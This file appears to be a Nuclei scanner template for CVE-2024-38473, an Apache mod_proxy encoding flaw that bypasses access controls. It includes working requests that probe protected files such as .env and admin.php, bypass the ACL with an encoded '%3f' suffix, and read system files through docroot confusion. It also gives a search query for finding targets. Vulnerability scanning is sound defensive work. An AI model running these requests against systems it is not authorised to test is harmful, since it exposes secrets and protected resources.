id: CVE-2024-38473

info:
  name: Apache HTTP Server - ACL Bypass
  author: pdteam
  severity: high
  description: |
    Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.
  impact: |
    Authenticated attackers can bypass ACL restrictions by crafting requests with incorrect encoding, potentially accessing protected backend services or resources that should be restricted by authentication mechanisms.
  remediation: |
    Upgrade to Apache HTTP Server version 2.4.60 or later.
  reference:
    - https://blog.orange.tw/2024/08/confusion-attacks-en.html#%E2%9A%94%EF%B8%8F-Primitive-1-2-ACL-Bypass
    - https://www.cvedetails.com/cve/CVE-2024-38473/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-38473
    - https://httpd.apache.org/security/vulnerabilities_24.html
    - https://security.netapp.com/advisory/ntap-20240712-0001/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 8.1
    cve-id: CVE-2024-38473
    cwe-id: CWE-116
    epss-score: 0.88359
    epss-percentile: 0.99514
    cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*,cpe:2.3:a:apache:httpd:*:*:*:*:*:*:*:*
  metadata:
    max-request: 10
    vendor: Apache Software Foundation
    product: Apache HTTP Server
    google-query: intitle:"Apache HTTP Server" inurl:"/server-status"
  tags: cve,cve2024,apache,acl-bypass,mod_proxy,php-fpm,vuln

flow: |
  http(1) && http(2)
  http(3)

http:
  # Path normalization ACL bypass
  - method: GET
    path:
      - "{{BaseURL}}/{{files}}"

    payloads:
      files:
        - admin.php
        - adminer.php
        - xmlrpc.php
        - .env
        - admin.php
        - php-info.php
        - php_info.php
        - phpinfo.php
        - info.php
        - adminer.php
        - xmlrpc.php
        - bin/cron.php
        - cache/index.tpl.php
        - cpanel.php

    stop-at-first-match: true
    matchers:
      - type: status
        status:
          - 403
          - 401
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/{{http_1_files}}%3ftest.php"

    matchers:
      - type: status
        status:
          - 200

  # docroot confusion
  - method: GET
    path:
      - "{{BaseURL}}/html/usr/share/doc/hostname/copyright%3f"

    matchers:
      - type: word
        words:
          - "On Debian systems, the complete text of the GNU General Public License"
          - "This package was written by Peter Tobias"
        condition: and
# digest: 4b0a00483046022100f1e55fbd4d9713d0a3ae568473a29343e26c042bc251abfd641567c60450fab1022100928b96099e98923217e1dcf3d9781a8dfef12d62663eb72002f18bdfc5fa5759:922c64590222798bb761d5b6d8e72950